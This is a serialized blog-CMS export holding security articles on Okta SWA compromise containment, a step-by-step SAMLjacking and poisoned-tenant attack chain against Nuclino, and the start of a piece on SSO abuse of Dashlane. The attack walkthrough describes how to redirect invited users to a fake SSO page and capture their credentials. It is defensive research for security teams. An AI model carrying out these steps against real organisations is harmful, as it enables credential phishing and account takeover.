",{"data":259194,"content":259195,"nodeType":178},{},[259196],{"data":259197,"marks":259198,"value":259199,"nodeType":173},{},[],"We’re going to assume all applications/credentials were accessed for the following containment advice, as it’s likely that even moderately-skilled attackers would have tools to automate this. ",{"data":259201,"content":259202,"nodeType":178},{},[259203],{"data":259204,"marks":259205,"value":259206,"nodeType":173},{},[],"A full belt and braces containment exercise would involve the following activities:",{"data":259208,"content":259209,"nodeType":250},{},[259210,259220,259230,259240],{"data":259211,"content":259212,"nodeType":254},{},[259213],{"data":259214,"content":259215,"nodeType":178},{},[259216],{"data":259217,"marks":259218,"value":259219,"nodeType":173},{},[],"Disabling/resetting the Okta account",{"data":259221,"content":259222,"nodeType":254},{},[259223],{"data":259224,"content":259225,"nodeType":178},{},[259226],{"data":259227,"marks":259228,"value":259229,"nodeType":173},{},[],"Disabling/resetting every single connected application account",{"data":259231,"content":259232,"nodeType":254},{},[259233],{"data":259234,"content":259235,"nodeType":178},{},[259236],{"data":259237,"marks":259238,"value":259239,"nodeType":173},{},[],"Identifying any other accounts that may share compromised SWA passwords for investigation and disabling/resetting",{"data":259241,"content":259242,"nodeType":254},{},[259243],{"data":259244,"content":259245,"nodeType":178},{},[259246],{"data":259247,"marks":259248,"value":259249,"nodeType":173},{},[],"Investigating every connected application account for signs of backdooring through multiple persistence techniques",{"data":259251,"content":259252,"nodeType":178},{},[259253],{"data":259254,"marks":259255,"value":259256,"nodeType":173},{},[],"The last point on investigating potential backdoors is particularly important because of the following reasons:",{"data":259258,"content":259259,"nodeType":250},{},[259260,259290],{"data":259261,"content":259262,"nodeType":254},{},[259263],{"data":259264,"content":259265,"nodeType":178},{},[259266,259270,259277,259280,259287],{"data":259267,"marks":259268,"value":259269,"nodeType":173},{},[],"Even if every application user account is temporarily disabled while passwords are reset etc, re-enabling the account could re-activate the attacker’s access if they have made use of persistence techniques like ",{"data":259271,"content":259272,"nodeType":186},{"uri":59347},[259273],{"data":259274,"marks":259275,"value":59350,"nodeType":173},{},[259276],{"type":194},{"data":259278,"marks":259279,"value":933,"nodeType":173},{},[],{"data":259281,"content":259282,"nodeType":186},{"uri":832},[259283],{"data":259284,"marks":259285,"value":835,"nodeType":173},{},[259286],{"type":194},{"data":259288,"marks":259289,"value":37,"nodeType":173},{},[],{"data":259291,"content":259292,"nodeType":254},{},[259293],{"data":259294,"content":259295,"nodeType":178},{},[259296,259300,259308],{"data":259297,"marks":259298,"value":259299,"nodeType":173},{},[],"Even if all application user accounts are disabled, even permanently, techniques like ",{"data":259301,"content":259302,"nodeType":186},{"uri":230093},[259303],{"data":259304,"marks":259305,"value":259307,"nodeType":173},{},[259306],{"type":194},"link sharing",{"data":259309,"marks":259310,"value":259311,"nodeType":173},{},[]," can enable attackers to maintain access to data because link sharing decouples the access from being reliant on control of a user account.",{"data":259313,"content":259314,"nodeType":169},{},[259315],{"data":259316,"marks":259317,"value":15539,"nodeType":173},{},[],{"data":259319,"content":259320,"nodeType":178},{},[259321],{"data":259322,"marks":259323,"value":259324,"nodeType":173},{},[],"We’ve covered a lot of ground here, so let’s take a quick step back to understand the key points of impact:",{"data":259326,"content":259327,"nodeType":250},{},[259328,259338,259348,259358,259368,259378],{"data":259329,"content":259330,"nodeType":254},{},[259331],{"data":259332,"content":259333,"nodeType":178},{},[259334],{"data":259335,"marks":259336,"value":259337,"nodeType":173},{},[],"Attackers can extract passwords for SWA apps, even if password reveal has been disabled - to be clear, this is not a bug, it’s just a technical limitation on how this style of password manager login has to work",{"data":259339,"content":259340,"nodeType":254},{},[259341],{"data":259342,"content":259343,"nodeType":178},{},[259344],{"data":259345,"marks":259346,"value":259347,"nodeType":173},{},[],"SWA passwords set by administrators should not be considered secret from the users as they can be accessed via the extension API",{"data":259349,"content":259350,"nodeType":254},{},[259351],{"data":259352,"content":259353,"nodeType":178},{},[259354],{"data":259355,"marks":259356,"value":259357,"nodeType":173},{},[],"Attackers gaining temporary control of an Okta user account can establish authenticated sessions with SAML/OIDC applications. ",{"data":259359,"content":259360,"nodeType":254},{},[259361],{"data":259362,"content":259363,"nodeType":178},{},[259364],{"data":259365,"marks":259366,"value":259367,"nodeType":173},{},[],"These sessions won’t automatically be revoked if the Okta user account is disabled/reset in response to compromise",{"data":259369,"content":259370,"nodeType":254},{},[259371],{"data":259372,"content":259373,"nodeType":178},{},[259374],{"data":259375,"marks":259376,"value":259377,"nodeType":173},{},[],"There are multiple common attack techniques to gain persistent access to SaaS applications.  ",{"data":259379,"content":259380,"nodeType":254},{},[259381],{"data":259382,"content":259383,"nodeType":178},{},[259384],{"data":259385,"marks":259386,"value":259387,"nodeType":173},{},[],"An attacker can potentially gain permanent access to many connected Okta applications even if efforts are made to reset individual application accounts",{"data":259389,"content":259390,"nodeType":169},{},[259391],{"data":259392,"marks":259393,"value":40632,"nodeType":173},{},[],{"data":259395,"content":259396,"nodeType":178},{},[259397],{"data":259398,"marks":259399,"value":259400,"nodeType":173},{},[],"While many of these attacks are not unique to Okta, it is one of the most widely used products because it supports many apps, but it supports these apps using methods that have very different risk profiles. ",{"data":259402,"content":259403,"nodeType":178},{},[259404],{"data":259405,"marks":259406,"value":259407,"nodeType":173},{},[],"From a security perspective (and whatever your chosen identity platform), our recommendation would be to use SAML (the strongest auth method) where possible. If that isn’t available, use OIDC. If neither is an option, use password managers (like SWA), which in practise leads to far less reused passwords. ",{"data":259409,"content":259410,"nodeType":178},{},[259411],{"data":259412,"marks":259413,"value":259414,"nodeType":173},{},[],"Unfortunately the state of modern cloud app landscape means that you will be paying a lot more to get many apps using federated SSO, and even then many will still not support this at any license tier, so the use of passwords is still going to be part of the solution.",{"data":259416,"content":259417,"nodeType":178},{},[259418],{"data":259419,"marks":259420,"value":259421,"nodeType":173},{},[],"As we have seen in this article, an attacker can use a compromised SSO session to perform a number of follow-up attacks. Whether using SWA or SAML/OIDC it’s possible to gain authenticated sessions on connected apps and also potentially backdoor access to them.",{"data":259423,"content":259424,"nodeType":178},{},[259425],{"data":259426,"marks":259427,"value":259428,"nodeType":173},{},[],"When using SWA, it’s additionally possible to extract SWA passwords even when password reveal is disabled and potentially gain access to passwords shared with other accounts. This requires additional actions as part of your breach recovery processes/play-books.",{"data":259430,"content":259431,"nodeType":178},{},[259432],{"data":259433,"marks":259434,"value":259435,"nodeType":173},{},[],"There are multiple log events that can be used by security teams to investigate and respond to Okta account compromises and potentially detect them too. Additionally, strong incident response procedures need to be in place for dealing with compromised Okta or any other SSO accounts that factor in the ability for an attacker to laterally move to all the connected applications. Therefore, plans need to include revoking their access to those as well and investigating them for signs of backdoor persistence techniques.","Abusing Okta's SWA authentication","We'll cover the implications of using Okta's SWA authentication method. Learn what security teams need to know in an account breach and IR scenario. ","2023-11-30T00:00:00.000Z","okta-swa",{"items":259441},[259442,259444],{"sys":259443,"name":26137},{"id":26136},{"sys":259445,"name":509},{"id":508},{"items":259447},[259448],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":259449},{"url":8615},{"__typename":1528,"sys":259451,"content":259452,"title":252406,"synopsis":259904,"hashTags":118,"publishedDate":259905,"slug":252407,"tagsCollection":259906,"authorsCollection":259912},{"id":228244},{"json":259453},{"data":259454,"content":259455,"nodeType":165},{},[259456,259474,259481,259488,259494,259510,259517,259534,259541,259548,259555,259562,259569,259576,259583,259603,259610,259617,259623,259630,259637,259644,259650,259656,259662,259669,259676,259682,259689,259696,259703,259709,259716,259723,259730,259737,259744,259750,259757,259764,259770,259777,259784,259790,259796,259803,259870,259877,259883,259890,259897],{"data":259457,"content":259458,"nodeType":178},{},[259459,259463,259470],{"data":259460,"marks":259461,"value":259462,"nodeType":173},{},[],"We published the ",{"data":259464,"content":259465,"nodeType":186},{"uri":88239},[259466],{"data":259467,"marks":259468,"value":88742,"nodeType":173},{},[259469],{"type":194},{"data":259471,"marks":259472,"value":259473,"nodeType":173},{},[]," on GitHub, which is an open-source research project to demonstrate the multitude of attacks that are possible against SaaS-native and hybrid SaaS organizations. On release day it contained 38 different techniques. ",{"data":259475,"content":259476,"nodeType":178},{},[259477],{"data":259478,"marks":259479,"value":259480,"nodeType":173},{},[],"However, we know it’s not just individual attack techniques and the phases of the cyber kill chain that matter - it’s also how you chain attacks together. Two lower risk vulnerabilities chained together could be a critical issue.",{"data":259482,"content":259483,"nodeType":178},{},[259484],{"data":259485,"marks":259486,"value":259487,"nodeType":173},{},[],"In this article, we’re going to demonstrate that by combining two of our favorite new SaaS attack techniques, poisoned tenants and SAMLjacking, you can make a simple, but effective attack chain.",{"data":259489,"content":259490,"nodeType":169},{},[259491],{"data":259492,"marks":259493,"value":227960,"nodeType":173},{},[],{"data":259495,"content":259496,"nodeType":178},{},[259497,259500,259507],{"data":259498,"marks":259499,"value":37,"nodeType":173},{},[],{"data":259501,"content":259502,"nodeType":186},{"uri":208521},[259503],{"data":259504,"marks":259505,"value":227973,"nodeType":173},{},[259506],{"type":194},{"data":259508,"marks":259509,"value":227977,"nodeType":173},{},[],{"data":259511,"content":259512,"nodeType":169},{},[259513],{"data":259514,"marks":259515,"value":259516,"nodeType":173},{},[],"What the hell is SAMLjacking?",{"data":259518,"content":259519,"nodeType":178},{},[259520,259523,259530],{"data":259521,"marks":259522,"value":37,"nodeType":173},{},[],{"data":259524,"content":259525,"nodeType":186},{"uri":63250},[259526],{"data":259527,"marks":259528,"value":63256,"nodeType":173},{},[259529],{"type":194},{"data":259531,"marks":259532,"value":259533,"nodeType":173},{},[]," is where an attacker makes use of SAML SSO configuration settings for a SaaS tenant they control in order to redirect users to a malicious link of their choosing during the authentication process. This can be highly effective for phishing as the original URL will be a legitimate SaaS URL and users are expecting to provide credentials.",{"data":259535,"content":259536,"nodeType":169},{},[259537],{"data":259538,"marks":259539,"value":259540,"nodeType":173},{},[],"What’s the benefit of combining them?",{"data":259542,"content":259543,"nodeType":178},{},[259544],{"data":259545,"marks":259546,"value":259547,"nodeType":173},{},[],"A poisoned tenant on its own could be an epic supply chain attack if you get really lucky. Imagine discovering an organization was wanting to migrate to Slack and then catching some key teams with a Slack poisoned tenant and gradually getting the whole organization migrated over. You’d have a goldmine of information as an administrator of the platform.",{"data":259549,"content":259550,"nodeType":178},{},[259551],{"data":259552,"marks":259553,"value":259554,"nodeType":173},{},[],"However, it might be hard to trick a whole organization into using an attacker controlled slack instance without anyone realizing, but it could be a lot easier to successfully invite e.g. a marketing team into using/adopting a new marketing app that helps them do SEO. This might be easier to perform, but it doesn't really give the attacker valuable data in the poisoned tenant of the marketing app, so it seems a bit pointless.",{"data":259556,"content":259557,"nodeType":178},{},[259558],{"data":259559,"marks":259560,"value":259561,"nodeType":173},{},[],"On the other hand, what about SAMLjacking? It’s a great technique on its own, but you still need to get users to login to the app. Sure, you’ll be sending them a legitimate SaaS URL with a valid TLS certificate etc and so it’s going to pass the sniff test for many people and also bypass email security appliances and similar security tools. However, you’re still effectively phishing them for credentials, the one thing we train users to be most suspicious about, so there is still a possibility they will spot the attack. ",{"data":259563,"content":259564,"nodeType":178},{},[259565],{"data":259566,"marks":259567,"value":259568,"nodeType":173},{},[],"But what if you could combine these techniques so that a poisoned tenant didn’t need to be a big, juicy target to be useful and a SAMLjacking attack didn’t even necessarily require phishing someone directly? What if the attack could be successful just from a target accessing their own bookmarks or open tabs for an app they already use?",{"data":259570,"content":259571,"nodeType":178},{},[259572],{"data":259573,"marks":259574,"value":259575,"nodeType":173},{},[],"In a combination scenario, a user doesn't need to be phished for SAMLjacking. One day they go back to their tab and it's logged out and they get SAMLjacked while logging back in. They don't have to click a link in an email. That’s what we are talking about here, so let’s consider an example of this making use of the SaaS-based wiki, Nuclino.",{"data":259577,"content":259578,"nodeType":169},{},[259579],{"data":259580,"marks":259581,"value":259582,"nodeType":173},{},[],"An example attack - Nuclino",{"data":259584,"content":259585,"nodeType":178},{},[259586,259590,259599],{"data":259587,"marks":259588,"value":259589,"nodeType":173},{},[],"Before moving on, I’d just like to point out that this isn’t a vulnerability with ",{"data":259591,"content":259593,"nodeType":186},{"uri":259592},"https://www.nuclino.com/",[259594],{"data":259595,"marks":259596,"value":259598,"nodeType":173},{},[259597],{"type":194},"Nuclino",{"data":259600,"marks":259601,"value":259602,"nodeType":173},{},[]," per se and it won’t be limited to Nuclino either. I’ve used Nuclino as an example because it’s a great wiki platform we use at Push Security, so I’m familiar with it. ",{"data":259604,"content":259605,"nodeType":178},{},[259606],{"data":259607,"marks":259608,"value":259609,"nodeType":173},{},[],"It also allows custom SAML authentication, both as part of its free trial and as part of its lowest tier paid plan. This should be commended as many SaaS apps don’t support SAML or other forms of SSO, and many of those that do charge a huge premium via enterprise plans to gain access to it. We love you Nuclino, sorry!",{"data":259611,"content":259612,"nodeType":178},{},[259613],{"data":259614,"marks":259615,"value":259616,"nodeType":173},{},[],"We'll take a walkthrough of how the attack chain works now. However, if you'd like to jump straight to a demo of the attack then checkout the video here:",{"data":259618,"content":259622,"nodeType":312},{"target":259619},{"sys":259620},{"id":259621,"type":317,"linkType":318},"3y6ZMPPsbh6PYlQ7IOxOzS",[],{"data":259624,"content":259625,"nodeType":178},{},[259626],{"data":259627,"marks":259628,"value":259629,"nodeType":173},{},[],"Next, we'll do a full walkthrough of the attack.",{"data":259631,"content":259632,"nodeType":235},{},[259633],{"data":259634,"marks":259635,"value":259636,"nodeType":173},{},[],"Step 1 - Setup a poisoned tenant and invite target users",{"data":259638,"content":259639,"nodeType":178},{},[259640],{"data":259641,"marks":259642,"value":259643,"nodeType":173},{},[],"The first step for an adversary is to set up their poisoned tenant and then make use of the invite functionality to target some employees of the target organization. With Nuclino, you can either do this by sending sharing links directly to the target or invite them through the Nuclino app, and it will send out legit email invitations on your behalf.",{"data":259645,"content":259649,"nodeType":312},{"target":259646},{"sys":259647},{"id":259648,"type":317,"linkType":318},"740nQhGSFp2nFU1b4DP7Mp",[],{"data":259651,"content":259655,"nodeType":312},{"target":259652},{"sys":259653},{"id":259654,"type":317,"linkType":318},"4GFL1L7Mmp3nnBODwC9SbH",[],{"data":259657,"content":259661,"nodeType":312},{"target":259658},{"sys":259659},{"id":259660,"type":317,"linkType":318},"7KUWKFFlDyvBVoM3MEhPwR",[],{"data":259663,"content":259664,"nodeType":235},{},[259665],{"data":259666,"marks":259667,"value":259668,"nodeType":173},{},[],"Step 2 - Target responds to the invitation or later signs up for Nuclino",{"data":259670,"content":259671,"nodeType":178},{},[259672],{"data":259673,"marks":259674,"value":259675,"nodeType":173},{},[],"The interesting thing here is that whether the target signs up for Nuclino directly from the joining link or they sign up for an account separately in future, they get mapped to the workspace they have been invited to by default.",{"data":259677,"content":259681,"nodeType":312},{"target":259678},{"sys":259679},{"id":259680,"type":317,"linkType":318},"2GlTHcT1cpQ44jb5lN9dr4",[],{"data":259683,"content":259684,"nodeType":235},{},[259685],{"data":259686,"marks":259687,"value":259688,"nodeType":173},{},[],"Step 3 - Configure a malicious SAML server",{"data":259690,"content":259691,"nodeType":178},{},[259692],{"data":259693,"marks":259694,"value":259695,"nodeType":173},{},[],"Once the adversary has a critical mass of users on their poisoned tenant, they can later engage the SAMLjacking attack. ",{"data":259697,"content":259698,"nodeType":178},{},[259699],{"data":259700,"marks":259701,"value":259702,"nodeType":173},{},[],"To do this, they need to configure a custom SAML server. You can point this to a fake authentication provider they control that mirrors the appearance of the SSO provider the target users are accustomed to using in order to capture credentials.",{"data":259704,"content":259708,"nodeType":312},{"target":259705},{"sys":259706},{"id":259707,"type":317,"linkType":318},"1RbhUTZd5Ak4UvjiZhub4V",[],{"data":259710,"content":259711,"nodeType":178},{},[259712],{"data":259713,"marks":259714,"value":259715,"nodeType":173},{},[],"If you toggle the setting to require SSO, existing users will be sent emails prompting them to link their accounts to SSO. That leads to two possible paths to a user compromise.",{"data":259717,"content":259718,"nodeType":169},{},[259719],{"data":259720,"marks":259721,"value":259722,"nodeType":173},{},[],"Paths to user compromise ",{"data":259724,"content":259725,"nodeType":235},{},[259726],{"data":259727,"marks":259728,"value":259729,"nodeType":173},{},[],"The first possibility",{"data":259731,"content":259732,"nodeType":178},{},[259733],{"data":259734,"marks":259735,"value":259736,"nodeType":173},{},[],"This compromise occurs when the target sees the email that SSO has been configured and clicks the link in order to link their account to SSO. A smart adversary may improve the social engineering quality with an email sent out in advance informing users that the internal security team has requested Nuclino be linked to SSO. This makes the target expect the email and consider it legitimate. ",{"data":259738,"content":259739,"nodeType":178},{},[259740],{"data":259741,"marks":259742,"value":259743,"nodeType":173},{},[],"Even though the email is an official email from Nuclino and the link contained is an official Nuclino URL, it will immediately redirect to the malicious SAML server that has been configured, where credentials can then be captured.",{"data":259745,"content":259749,"nodeType":312},{"target":259746},{"sys":259747},{"id":259748,"type":317,"linkType":318},"6zWiAfBx7aaUeo6t04AtUl",[],{"data":259751,"content":259752,"nodeType":235},{},[259753],{"data":259754,"marks":259755,"value":259756,"nodeType":173},{},[],"Second compromise possibility",{"data":259758,"content":259759,"nodeType":178},{},[259760],{"data":259761,"marks":259762,"value":259763,"nodeType":173},{},[],"If the user ignores the email, the other potential outcome occurs when their session expires and they need to login again to regain access. This is similar to a watering hole attack. When their session expires, the target’s open tabs or bookmarks will redirect back to the workspace specific login page, which will now look like this:",{"data":259765,"content":259769,"nodeType":312},{"target":259766},{"sys":259767},{"id":259768,"type":317,"linkType":318},"580CvVtdyEpqdiK8T1lSfQ",[],{"data":259771,"content":259772,"nodeType":178},{},[259773],{"data":259774,"marks":259775,"value":259776,"nodeType":173},{},[],"Clicking the button to login with SSO will immediately redirect to the malicious SAML server and launch the attack. Alternatively, if the target attempts to login without SSO, the login will fail with an error message telling them to login with SSO.",{"data":259778,"content":259779,"nodeType":178},{},[259780],{"data":259781,"marks":259782,"value":259783,"nodeType":173},{},[],"Either way, once the SAMLjacking has taken effect, they’ll be faced with a familiar-looking SSO login page from a trusted source at a point they are expecting to enter their credentials - something even the most paranoid of users could easily fall for unknowingly. ",{"data":259785,"content":259789,"nodeType":312},{"target":259786},{"sys":259787},{"id":259788,"type":317,"linkType":318},"5eFctGgFywtmhhjaXVraqN",[],{"data":259791,"content":259792,"nodeType":169},{},[259793],{"data":259794,"marks":259795,"value":15539,"nodeType":173},{},[],{"data":259797,"content":259798,"nodeType":178},{},[259799],{"data":259800,"marks":259801,"value":259802,"nodeType":173},{},[],"At this point, having compromised multiple user’s Google credentials, an adversary has a lot of options available:",{"data":259804,"content":259805,"nodeType":250},{},[259806,259816,259826,259848],{"data":259807,"content":259808,"nodeType":254},{},[259809],{"data":259810,"content":259811,"nodeType":178},{},[259812],{"data":259813,"marks":259814,"value":259815,"nodeType":173},{},[],"Access all data in Google apps like GMail, Google Drive etc",{"data":259817,"content":259818,"nodeType":254},{},[259819],{"data":259820,"content":259821,"nodeType":178},{},[259822],{"data":259823,"marks":259824,"value":259825,"nodeType":173},{},[],"Access other SaaS apps that use SSO with the same Google account",{"data":259827,"content":259828,"nodeType":254},{},[259829],{"data":259830,"content":259831,"nodeType":178},{},[259832,259836,259845],{"data":259833,"marks":259834,"value":259835,"nodeType":173},{},[],"Access other SaaS apps that use ",{"data":259837,"content":259839,"nodeType":186},{"uri":259838},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/passwordless_logins/description.md",[259840],{"data":259841,"marks":259842,"value":259844,"nodeType":173},{},[259843],{"type":194},"passwordless logins",{"data":259846,"marks":259847,"value":37,"nodeType":173},{},[],{"data":259849,"content":259850,"nodeType":254},{},[259851],{"data":259852,"content":259853,"nodeType":178},{},[259854,259858,259867],{"data":259855,"marks":259856,"value":259857,"nodeType":173},{},[],"Access other SaaS apps via email ",{"data":259859,"content":259861,"nodeType":186},{"uri":259860},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/account_recovery/description.md",[259862],{"data":259863,"marks":259864,"value":259866,"nodeType":173},{},[259865],{"type":194},"account recovery",{"data":259868,"marks":259869,"value":37,"nodeType":173},{},[],{"data":259871,"content":259872,"nodeType":178},{},[259873],{"data":259874,"marks":259875,"value":259876,"nodeType":173},{},[],"Essentially, this can potentially lead to a compromise of every SaaS application accessible by the compromised user - all from the use of a poisoned tenant for an app with no particularly sensitive data or permissions.",{"data":259878,"content":259879,"nodeType":235},{},[259880],{"data":259881,"marks":259882,"value":40632,"nodeType":173},{},[],{"data":259884,"content":259885,"nodeType":178},{},[259886],{"data":259887,"marks":259888,"value":259889,"nodeType":173},{},[],"We have seen how two new SaaS-focused attack techniques can be combined into one more effective attack chain. This shows how a successful poisoned tenant attack for even a low risk app can still be a significant threat when combined with a SAMLjacking attack. ",{"data":259891,"content":259892,"nodeType":178},{},[259893],{"data":259894,"marks":259895,"value":259896,"nodeType":173},{},[],"This demonstrates even the least sensitive edge cases of SaaS sprawl can represent a vector to laterally move to compromise much more valuable assets. History taught us that protecting core production assets was not enough. Adversaries often achieved compromises via test systems and unsecured development resources. What we are seeing now is that this parallel exists in the SaaS-native world too. Therefore, we need to be protecting all SaaS resources with greater vigilance than their standalone sensitivity would indicate.",{"data":259898,"content":259899,"nodeType":178},{},[259900],{"data":259901,"marks":259902,"value":259903,"nodeType":173},{},[],"So what can be done about it? Well, like much in security, there is no silver bullet solution to this issue. SaaS apps are here to stay and are designed to be flexible, easy to sign up for and use. The key first step is always to get good visibility into the SaaS sprawl across your organization. If certain employees or teams start making use of a new SaaS app (or a new tenant for an existing one), that’s probably something your security team should be aware of so they can make sure it’s legitimate and being used as securely as possible. ","In this article, we’re going to demo combining two of our favorite new SaaS attack techniques to make a simple, but effective attack chain.\n","2023-08-17T00:00:00.000Z",{"items":259907},[259908,259910],{"sys":259909,"name":505},{"id":504},{"sys":259911,"name":509},{"id":508},{"items":259913},[259914],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":259915},{"url":8615},{"items":259917},[259918],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":259919},{"url":8615},{"json":259921,"links":260419},{"nodeType":165,"data":259922,"content":259923},{},[259924,259931,259938,259945,259952,259959,259966,259973,259980,259987,259994,260009,260016,260023,260039,260046,260053,260060,260076,260083,260089,260096,260103,260109,260116,260123,260130,260137,260144,260151,260158,260165,260171,260178,260185,260191,260197,260203,260210,260217,260235,260242,260249,260256,260287,260294,260300,260306,260313,260320,260327,260334,260339,260345,260352,260385,260391,260398,260405,260412],{"nodeType":169,"data":259925,"content":259926},{},[259927],{"nodeType":173,"value":259928,"marks":259929,"data":259930},"Admin accounts - the keys to the kingdom?",[],{},{"nodeType":178,"data":259932,"content":259933},{},[259934],{"nodeType":173,"value":259935,"marks":259936,"data":259937},"Traditionally, admin accounts have tended to be pretty all-powerful in terms of the infrastructure they control access to, a kind of master key. An admin of a file server? Can see any files on that server they like. A windows domain admin? Can access any system connected to that domain, access password equivalents for every domain account, and even deploy code remotely to all connected systems. Necessary and practical for admins, but a nightmare for blue teamers.",[],{},{"nodeType":178,"data":259939,"content":259940},{},[259941],{"nodeType":173,"value":259942,"marks":259943,"data":259944},"In the realm of cloud identities and SaaS apps, the situation has changed a bit. An account with administrative access for a given SaaS app is limited by what that particular app does and what administrative features it offers. This means the traditional “all-powerful” admin account isn’t always really all-powerful in practice. ",[],{},{"nodeType":178,"data":259946,"content":259947},{},[259948],{"nodeType":173,"value":259949,"marks":259950,"data":259951},"For example, an administrator of a file storage SaaS app may not automatically have rights to view all personally stored files for an individual user. Similarly, an administrator of a corporate password manager app does not automatically have the ability to view the secrets their users are storing in the application. This is desirable as passwords, and thus password managers, are a key part of identity infrastructure - even admins shouldn’t be able to easily access passwords and secrets stored within. ",[],{},{"nodeType":178,"data":259953,"content":259954},{},[259955],{"nodeType":173,"value":259956,"marks":259957,"data":259958},"This is a good thing as it limits the reach of a compromised account and creates additional steps for a user with malicious intent. But like anything password managers can be targeted, bypassed, and misused, particularly in the context of Cloud identities and SaaS.",[],{},{"nodeType":169,"data":259960,"content":259961},{},[259962],{"nodeType":173,"value":259963,"marks":259964,"data":259965},"How do password managers work?",[],{},{"nodeType":178,"data":259967,"content":259968},{},[259969],{"nodeType":173,"value":259970,"marks":259971,"data":259972},"Well, it depends! ",[],{},{"nodeType":178,"data":259974,"content":259975},{},[259976],{"nodeType":173,"value":259977,"marks":259978,"data":259979},"Typical password manager functionality involves a “password vault” being encrypted with a password/secret that only the user knows - commonly known as a “master password”. This vault might just be a file that can be stored anywhere, such as locally on a user’s laptop or remotely on a managed file server.  ",[],{},{"nodeType":178,"data":259981,"content":259982},{},[259983],{"nodeType":173,"value":259984,"marks":259985,"data":259986},"Therefore, an admin of a file server might be able to see the password vaults, but won’t be able to recover the passwords inside without knowing the correct master password to decrypt them. However, a domain or desktop admin might be able to deploy malicious code to a user’s endpoint to keylog, or otherwise steal, their master password. This is more difficult than merely accessing an encrypted vault but is a viable attack technique.",[],{},{"nodeType":178,"data":259988,"content":259989},{},[259990],{"nodeType":173,"value":259991,"marks":259992,"data":259993},"For cloud-based password managers this concept is simply ported to the world of SaaS. Here, the vault is stored securely on the vendor’s servers and access is via a web app or browser extension, rather than a desktop application opening a stored file. Often the password a user uses to login to the app doubles up as their master password, but in other solutions they might be two separate concepts. ",[],{},{"nodeType":178,"data":259995,"content":259996},{},[259997,260001,260005],{"nodeType":173,"value":259998,"marks":259999,"data":260000},"So how does this change the threat? Well, it’s possible that domain/desktop admins might still be able to go the malicious code deployment route to steal master passwords. However, admins of the password manager app (or any app) should not ",[],{},{"nodeType":173,"value":151982,"marks":260002,"data":260004},[260003],{"type":1646},{},{"nodeType":173,"value":260006,"marks":260007,"data":260008}," be able to just access any passwords they like.",[],{},{"nodeType":169,"data":260010,"content":260011},{},[260012],{"nodeType":173,"value":260013,"marks":260014,"data":260015},"Why even use password managers when you could use SSO?",[],{},{"nodeType":178,"data":260017,"content":260018},{},[260019],{"nodeType":173,"value":260020,"marks":260021,"data":260022},"Strong SSO mechanisms such as SAML are good security controls and should be encouraged. But there are many reasons why they can’t always be used. Not all apps support them, some apps require much more expensive license tiers in order to enable SSO support, many apps will be self-acquired by users rather than centralized IT, some secrets are recovery codes that need to be stored somewhere… the list goes on!",[],{},{"nodeType":178,"data":260024,"content":260025},{},[260026,260030,260035],{"nodeType":173,"value":260027,"marks":260028,"data":260029},"Put simply, ",[],{},{"nodeType":173,"value":260031,"marks":260032,"data":260034},"you will never have all your apps on SSO",[260033],{"type":370},{},{"nodeType":173,"value":260036,"marks":260037,"data":260038}," and there are many other use cases for secure storage of secrets, so it’s best to provide a secure password management solution to your users rather than having them use shared passwords everywhere, use easily guessed passwords, or generally record them in less secure ways. ",[],{},{"nodeType":178,"data":260040,"content":260041},{},[260042],{"nodeType":173,"value":260043,"marks":260044,"data":260045},"But what happens when a large organization adopts a SaaS-based password manager solution? As a key app, it definitely needs the highest levels of security protection, right? So the password manager itself should definitely be on SSO with a robust form of MFA applied. Users shouldn't be able to use any old single-factor password to access a store for important secrets that are tied to so many other sensitive corporate assets.",[],{},{"nodeType":178,"data":260047,"content":260048},{},[260049],{"nodeType":173,"value":260050,"marks":260051,"data":260052},"This leads us on to our next question - how does SSO impact the relationship between accessibility of stored secrets and the use of decryption keys only known to the users?",[],{},{"nodeType":169,"data":260054,"content":260055},{},[260056],{"nodeType":173,"value":260057,"marks":260058,"data":260059},"Controlling password manager access via SSO",[],{},{"nodeType":178,"data":260061,"content":260062},{},[260063,260067,260072],{"nodeType":173,"value":260064,"marks":260065,"data":260066},"Many solutions will allow administrators to control login to accounts via an SSO mechanism instead of the vendor’s own authentication mechanism. In this case, we’ll be using Dashlane as an example. This is not a specific vulnerability in Dashlane, we’re just ",[],{},{"nodeType":173,"value":260068,"marks":260069,"data":260071},"creatively",[260070],{"type":1646},{},{"nodeType":173,"value":260073,"marks":260074,"data":260075}," (ab-)using a legitimate feature. We haven’t picked on Dashlane for any particular reason and there are many more examples of this.",[],{},{"nodeType":178,"data":260077,"content":260078},{},[260079],{"nodeType":173,"value":260080,"marks":260081,"data":260082},"In this case, we’ve configured Dashlane SSO to use their confidential SSO mechanism that applies SAML as the SSO mechanism. We've then configured the supplied SAML details as an app in Okta and saved the resulting IdP metadata link in Dashlane. This allows Okta to now act as an identity provider for Dashlane.",[],{},{"nodeType":312,"data":260084,"content":260088},{"target":260085},{"sys":260086},{"id":260087,"type":317,"linkType":318},"19DCAdVfW2MwRQXfeVEIiR",[],{"nodeType":178,"data":260090,"content":260091},{},[260092],{"nodeType":173,"value":260093,"marks":260094,"data":260095},"This means that for verified domains that have been configured to use SSO in Dashlane, the Dashlane login process will now automatically relay to the given Okta tenant to handle authentication via SAML.",[],{},{"nodeType":178,"data":260097,"content":260098},{},[260099],{"nodeType":173,"value":260100,"marks":260101,"data":260102},"It’s worth noting that Dashlane only allows this for verified domains. An administrator setting this up the first time or later changing the SSO settings will need control of the DNS domain(s) their users use, or at least have the ability to request other DNS admins verify the domain on their behalf.",[],{},{"nodeType":312,"data":260104,"content":260108},{"target":260105},{"sys":260106},{"id":260107,"type":317,"linkType":318},"3kZknbwaOVWMTPdaEECyER",[],{"nodeType":178,"data":260110,"content":260111},{},[260112],{"nodeType":173,"value":260113,"marks":260114,"data":260115},"That’s it - it’s really that simple. Now your Dashlane instance benefits from whatever strong authentication policies you have in place on your centralized IdP, in this case Okta. That may include strong password policies, multi-factor authentication, auditing of all logon events for your account, etc. What could be bad about that?",[],{},{"nodeType":169,"data":260117,"content":260118},{},[260119],{"nodeType":173,"value":260120,"marks":260121,"data":260122},"Password stealing and lateral movement",[],{},{"nodeType":178,"data":260124,"content":260125},{},[260126],{"nodeType":173,"value":260127,"marks":260128,"data":260129},"As we covered earlier, the original security contract of traditional password managers was that only the creating user should have access via a master password - admin accounts should have no access beyond seeing the encrypted vault files. 